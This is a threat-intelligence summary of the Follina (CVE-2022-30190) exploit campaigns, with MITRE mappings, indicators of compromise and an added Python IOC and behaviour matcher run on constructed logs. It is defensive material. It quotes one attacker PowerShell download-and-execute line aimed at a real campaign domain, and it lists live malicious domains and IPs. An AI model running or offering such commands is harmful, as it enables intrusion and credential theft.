Two-sentence summary: An in-depth analysis shows how the Follina exploit (CVE-2022-30190) is weaponized to achieve remote code execution via MSDT and to enable persistent, live-off-the-land attacker activity using native Windows tools. The report details three in-the-wild payload chains leveraging Cobalt Strike, Mimikatz, and PowerShell to persist, escalate, and exfiltrate data while evading security monitoring. #Follina #MSDT #CobaltStrike #Mimikatz #PowerShell #WebDAV #CVE-2022-30190
Keypoints
- The Follina vulnerability (CVE-2022-30190) enables remote code execution through the MSDT protocol handler when invoked from Office applications.
- Researchers analyzed three in-the-wild campaigns that use Follina to deliver persistence and exploitation tools, including Cobalt Strike and Mimikatz, often via PowerShell scripts.
- Exploit Chain 1 shows a Cobalt Strike beacon loader delivered from a remote WebDAV/SMB share, with the net use command used to mount the share before executing the payload.
- Exploit Chain 2 uses PowerShell-based payloads and Mimikatz to harvest credentials, exfiltrate data, and persist via a scheduled task (Enable-ScheduledTask).
- Exploit Chain 3 describes an unknown backdoor that uses rundll32.exe and pcwutl.dll to load a payload and connect to a remote host, highlighting variability in payload delivery.
- Common evasion themes include direct syscalls to evade API monitoring, Base64-encoded payloads, and .NET/PowerShell-based loaders designed to bypass detections.
- Rapid patching of CVE-2022-30190 and monitoring of specific IOCs (hashes, domains, and IPs) are recommended to detect and disrupt these campaigns.
MITRE Techniques
- [T1203] Exploitation for Client Execution – The Follina vulnerability is exploited when MSDT is invoked via a URL protocol from a document, allowing arbitrary code execution. “ms-msdt, the Microsoft Support Diagnostic Tool (MSDT) protocol handler, passing a list of options.”
- [T1566.001] Phishing – Delivery via phishing documents and active campaigns leveraging the Follina exploit. “Researchers discovered the Follina exploit being used in phishing documents and active campaigns.”
- [T1059.001] PowerShell – PowerShell scripts used to obtain persistent access and harvest data and credentials from victim networks. “The payloads delivered via this exploit chain were PowerShell scripts used to obtain persistent access and harvest data and credentials.”
- [T1053.005] Scheduled Task – Persistence via scheduled tasks (Enable-ScheduledTask) and a named task. “Scheduled Task using the PowerShell commandlet Enable-ScheduledTask and the task name MicrosoftEdgeUpdateTaskMaEnglishAPUAL.”
- [T1021.001] SMB/Windows Admin Shares – Use of net use to mount a remote share and execute the payload there. “The use of the ‘net use’ command with a username and password to execute the payload on a mounted network share.”
- [T1041] Exfiltration Over C2 Channel – Data exfiltration to the C2 server, including registry hives and other credentials. “Exporting … registry hives as .zip files and then uploading them to the Command and Control (C2) server.”
- [T1055] Process Injection – The loader injects shellcode into a process and uses a Cobalt Strike beacon. “injects the decrypted shellcode for a Cobalt Strike beacon.”
- [T1003.001] Credential Dumping – Mimikatz usage to harvest credentials from memory/credentials stores. “Invoke-Mimikatz script used to harvest credentials…”
- [T1087] Account Discovery – Discovery of user accounts, groups and administrators using WMIC. “Enumerating user accounts, groups and administrators using WMIC.”
- [T1105] Ingress Tool Transfer – Downloading and executing payloads from remote servers (e.g., the seller-notification.live/Zgfbe234dg URL). “powershell -nop -c … DownloadString(‘https://seller-notification.live/Zgfbe234dg’)”
Indicators of Compromise
- [Filesystem] context – 83fde764f70378b4b0610d87e86faac6dc5bc54b (Word Document), 6e9e90431e5e660071b683d121ad887d3726a4a0 (Embedded XML File), 7ed97610cdee3c69be2961543ce619485b680572 (HTML Page), and other N items
- [Filename] context – osdupdate.exe, wstmp.exe, and pcwutl.dll (Payload-related artifacts seen across chains)
- [Network] context – files.attend-doha-expo.com, 5.206.224.233, telecomly.info, seller-notification.live, 65.20.75.158, t1bet.net, 45.77.45.222:110 (example indicators; multiple items listed in article)
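The indicators above, together with the two behaviours the report describes (MSDT launched from an Office process via the ms-msdt: handler, and rundll32.exe loading pcwutl.dll), can be turned into a small triage matcher. The following is an added example written for this summary, not code from the ReversingLabs article: the hash, domain, IP and filename values are the ones quoted on this page, while the tab-separated `key=value` telemetry format and the sample log lines are constructed for the demo and do not correspond to any real product's output.

```python
"""Match the Follina-campaign indicators from this page against endpoint telemetry.

Added example, not part of the original report. Indicator values are copied from
the page; the log format (event<TAB>key=value<TAB>...) and SAMPLE_LOGS are
constructed assumptions for demonstration only.
"""

# SHA-1 hashes quoted on the page, with the artifact type given there.
IOC_SHA1 = {
    "83fde764f70378b4b0610d87e86faac6dc5bc54b": "Word Document",
    "6e9e90431e5e660071b683d121ad887d3726a4a0": "Embedded XML File",
    "7ed97610cdee3c69be2961543ce619485b680572": "HTML Page",
}
IOC_DOMAINS = {"files.attend-doha-expo.com", "telecomly.info",
               "seller-notification.live", "t1bet.net"}
IOC_IPS = {"5.206.224.233", "65.20.75.158", "45.77.45.222"}
IOC_FILENAMES = {"osdupdate.exe", "wstmp.exe", "pcwutl.dll"}

# Office hosts from which an msdt.exe child is suspicious (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse(line):
    """Parse one constructed telemetry line into a dict (first field = event type)."""
    parts = line.rstrip("\n").split("\t")
    rec = {"event": parts[0]}
    for kv in parts[1:]:
        key, _, value = kv.partition("=")   # cmdline may itself contain '='
        rec[key] = value
    return rec


def classify(line):
    """Return a list of (rule, detail) hits for one line; empty list if clean."""
    rec = parse(line)
    hits = []
    sha1 = rec.get("sha1", "").lower()
    if sha1 in IOC_SHA1:
        hits.append(("ioc_hash", f"{sha1} = {IOC_SHA1[sha1]}"))
    cmd = rec.get("cmdline", "").lower()
    image = basename(rec.get("image", ""))
    names = {image} | {n for n in IOC_FILENAMES if n in cmd}
    found = sorted(names & IOC_FILENAMES)
    if found:
        hits.append(("ioc_filename", ", ".join(found)))
    host = rec.get("dest", "").rsplit(":", 1)[0].lower()
    doms = sorted({d for d in IOC_DOMAINS if d == host or d in cmd})
    if doms:
        hits.append(("ioc_domain", ", ".join(doms)))
    if host in IOC_IPS:
        hits.append(("ioc_ip", host))
    # Behavioural rule 1: ms-msdt: handler invoked with an Office parent (T1203).
    parent = basename(rec.get("parent", ""))
    if parent in OFFICE_PARENTS and "ms-msdt:" in cmd:
        hits.append(("follina_msdt_from_office", f"{parent} -> {cmd[:60]}"))
    # Behavioural rule 2: rundll32.exe loading pcwutl.dll (Exploit Chain 3).
    if image == "rundll32.exe" and "pcwutl.dll" in cmd:
        hits.append(("rundll32_pcwutl", cmd[:60]))
    return hits


def scan(lines):
    """Return [(line_index, [rule, ...]), ...] for every line with at least one hit."""
    results = []
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            results.append((i, [rule for rule, _ in hits]))
    return results


# Constructed sample telemetry (not real logs).
SAMPLE_LOGS = [
    "\t".join(["process", r"parent=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
               r"image=C:\Windows\System32\msdt.exe",
               "cmdline=msdt.exe ms-msdt:/id PCWDiagnostic /skip force"]),
    "\t".join(["network", r"image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
               "dest=seller-notification.live:443"]),
    "\t".join(["file", r"image=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
               "file=invoice.docx", "sha1=83FDE764F70378B4B0610D87E86FAAC6DC5BC54B"]),
    "\t".join(["process", r"parent=C:\Windows\explorer.exe",
               r"image=C:\Windows\System32\rundll32.exe",
               r"cmdline=rundll32.exe pcwutl.dll,LaunchApplication C:\Users\Public\wstmp.exe"]),
    "\t".join(["network", r"image=C:\Program Files\Google\Chrome\Application\chrome.exe",
               "dest=update.example.com:443"]),
    "\t".join(["network", r"image=C:\Users\Public\osdupdate.exe", "dest=45.77.45.222:110"]),
]

if __name__ == "__main__":
    for idx, line in enumerate(SAMPLE_LOGS):
        for rule, detail in classify(line):
            print(f"line {idx}: {rule}: {detail}")
```

The two behavioural rules are deliberately separate from the indicator lists: hashes and infrastructure rotate between campaigns, whereas an Office process spawning msdt.exe with an ms-msdt: argument, or rundll32.exe loading pcwutl.dll, is the pattern the report attributes to the technique itself and survives a change of payload or C2.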
Read more: https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks